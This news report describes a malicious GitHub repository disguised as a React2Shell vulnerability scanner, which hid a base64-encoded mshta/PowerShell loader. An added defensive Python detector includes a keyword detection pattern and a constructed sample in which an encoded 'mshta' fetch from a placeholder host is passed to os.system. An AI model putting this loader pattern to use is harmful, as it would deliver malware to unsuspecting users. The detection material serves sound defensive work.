Malicious GitHub Repository Impersonating CVE-2025-55182 Scanner Exposed
A GitHub repository masquerading as a vulnerability scanner for CVE-2025-55182, commonly known as “React2Shell,” was recently uncovered as a source of malware. The project, titled React2shell-scanner, was associated with the GitHub user niha0wa but has been removed from the platform after community alerts regarding its malicious intent surfaced.
Cybersecurity researcher Saurabh raised alarms on LinkedIn about the now-deleted tool last week after discovering suspicious behavior embedded in the code. His investigation revealed that the script contained a concealed payload designed to execute mshta.exe, enabling it to fetch a remote file from py-installer.cc. This method is a known technique for deploying secondary malware payloads.
A closer examination of the script confirmed Saurabh’s concerns. The malware was embedded within react2shellpy.py as a set of base64-encoded strings that, once decoded, formed a PowerShell command. Hiding a loader inside encoded string literals is a common tactic threat actors use to obscure malicious intent within seemingly benign software.
Targeting Windows systems, the malware leveraged mshta.exe, a legitimate Windows utility often exploited to execute harmful scripts without user notification or suspicion. This underhanded tactic turns what appears to be a beneficial security tool into a potential gateway for cyber compromise.
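The pattern described above, base64 literals in a Python file that decode to a PowerShell or mshta command, can be surfaced with a static check before a tool is ever run. The following is an added example, not code from the original report or from the repository: it parses a Python source file, decodes any long base64-shaped string literal (including ones split across `"a" + "b"` concatenations), and flags those that decode to text mentioning mshta, PowerShell, or a remote URL. The `SAMPLE_SCANNER` text and the `example.invalid` host are constructed for the demonstration.

```python
import ast
import base64
import re

# Keywords that, inside a decoded base64 literal, warrant manual review.
SUSPICIOUS = re.compile(r"mshta|powershell|encodedcommand|invoke-expression|\biex\b|downloadstring|https?://", re.I)
# Only long base64-shaped literals are decoded; short tokens are mostly noise.
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")

def _string_literals(tree):
    """Yield string constants, also joining "a" + "b" concatenation chains."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.value
        elif isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            parts, cur = [], node
            while isinstance(cur, ast.BinOp) and isinstance(cur.op, ast.Add):
                parts.append(cur.right)
                cur = cur.left
            parts.append(cur)
            if all(isinstance(p, ast.Constant) and isinstance(p.value, str) for p in parts):
                yield "".join(p.value for p in reversed(parts))

def find_hidden_commands(source):
    """Return (literal, decoded_text) pairs for base64 strings that hide a command."""
    hits = []
    for lit in _string_literals(ast.parse(source)):
        compact = "".join(lit.split())
        if not B64_SHAPE.match(compact):
            continue
        try:
            raw = base64.b64decode(compact, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-8", "utf-16-le"):  # UTF-16LE is what PowerShell -EncodedCommand uses
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if SUSPICIOUS.search(text):
                hits.append((compact, text))
                break
    return hits

# Constructed sample: a fake "scanner" hiding an mshta launcher in a split base64 literal.
HIDDEN_B64 = base64.b64encode(b"mshta http://example.invalid/stage.hta").decode()  # placeholder host
SAMPLE_SCANNER = (
    f'_cmd = "{HIDDEN_B64[:26]}" + "{HIDDEN_B64[26:]}"\n'
    'import os; os.system(__import__("base64").b64decode(_cmd).decode())\n'
)
```

Running `find_hidden_commands(SAMPLE_SCANNER)` returns the joined literal together with its decoded mshta command, while the two halves on their own are skipped because they are not valid base64.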
The deceptive scanner was ostensibly designed for security professionals investigating CVE-2025-55182, posing as a useful resource while simultaneously endangering those seeking to enhance their understanding of the vulnerability. By masquerading as a credible security application, it transformed routine research activities into potential threats for cybersecurity experts.
This incident comes on the heels of previous reports highlighting hackers embedding the new PyStoreRAT malware into utility tools on GitHub, specifically targeting OSINT and cybersecurity researchers. These alarming trends underscore the need for heightened vigilance in the cybersecurity community.
While GitHub took swift action to remove the repository, the situation serves as a potent reminder that tools associated with cybersecurity must be scrutinized carefully. The belief that software hosted on well-known platforms is inherently safe can lead to severe vulnerabilities and risks.
Saurabh’s warnings emphasize the importance of thorough code reviews before deploying any third-party tools, particularly those that claim to assist in vulnerability detection. Industry professionals are urged to remain wary of engaging with tools that lack clear authorship or exhibit obfuscated coding patterns.
Although the malicious script has been removed from GitHub, it is important to note that cached copies or forks may still exist in various forms. Researchers investigating CVE-2025-55182 or related vulnerabilities must remain alert to fake exploit tools, especially those that exhibit signs of obfuscation or encode unexpected callbacks.
When analyzing the tactics used in this incident, mapping them to the MITRE ATT&CK framework is useful. The attack relied on abusing a legitimate, signed Windows utility, mshta.exe, to fetch and run its next stage, and it exemplifies the risk of trusting sources that merely appear authentic. Cybersecurity professionals must continuously enhance their understanding and awareness to safeguard against these evolving threats.